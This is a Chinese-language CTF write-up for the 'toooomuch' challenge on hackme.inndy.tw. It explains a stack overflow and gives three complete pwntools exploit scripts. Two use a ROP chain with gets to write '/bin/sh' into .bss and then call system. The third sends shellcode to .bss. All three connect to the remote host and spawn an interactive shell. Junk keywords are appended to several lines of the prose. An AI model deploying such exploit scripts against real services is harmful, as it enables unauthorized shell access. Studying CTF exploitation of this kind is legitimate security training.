checksec一下,发现啥保护也没有,不须要再找libc的版本了python
这里的漏洞点在toomuch1中说过了shell
在toooomuch函数中,覆盖0x18+4个值,便可达到溢出效果函数
下一步目标是:将"/bin/sh"写入bss段中,而后执行system函数便可3d
相似x64平台,在x86中也有类似的通用gadgets调试
exp1:code
利用gets+system:blog
#!/usr/bin/env python # coding=utf-8 from pwn import * #io = process("./toooomuch") io = remote("hackme.inndy.tw", 7702) elf = ELF("./toooomuch") gets = elf.symbols['gets'] log.info("gets_addr = " + str(hex(gets))) bss = elf.bss() log.info("bss_addr = " + str(hex(bss))) pr = 0x804889B system_plt = 0x080484C0 payload = "A" * 0x18 + "B" * 4 payload += p32(gets) + p32(pr) + p32(bss) payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD) io.sendline(payload) sleep(1) io.sendline("/bin/sh\x00") io.interactive()
exp2:utf-8
#!/usr/bin/env python # coding=utf-8 from pwn import * #io = process("./toooomuch") io = remote("hackme.inndy.tw", 7702) elf = ELF("./toooomuch") gets = elf.symbols['gets'] log.info("gets_addr = " + str(hex(gets))) bss = elf.bss() log.info("bss_addr = " + str(hex(bss))) pr = 0x804889B system = 0x8048649 payload = "A" * 0x18 + "B" * 4 payload += p32(gets) + p32(pr) + p32(bss) payload += p32(system) + p32(bss) + p32(0xABCD) io.sendline(payload) sleep(1) io.sendline("/bin/sh\x00") io.interactive()
分析一下:rem
exp1和exp2的不一样点:exp1中,调用的是system_plt,没有pop—ret指令,即没有返回地址,因此要本身构造get
exp2中,调用的是函数中的对system的调用,以后有pop和retn,即有恢复堆栈
单步调试便可看到区别
exp3:
#!/usr/bin/env python # coding=utf-8 from pwn import * elf = ELF("./toooomuch") io = remote("hackme.inndy.tw", 7702) gets = elf.symbols['gets'] bss = elf.bss() log.info("gets addr = " + str(hex(gets))) log.info("bss addr = " + str(hex(bss))) payload = "A" * 0x18 + "B" * 4 payload += p32(gets) + p32(bss) + p32(bss) io.recvuntil("passcode: ") io.sendline(payload) io.sendline(asm(shellcraft.sh())) io.interactive()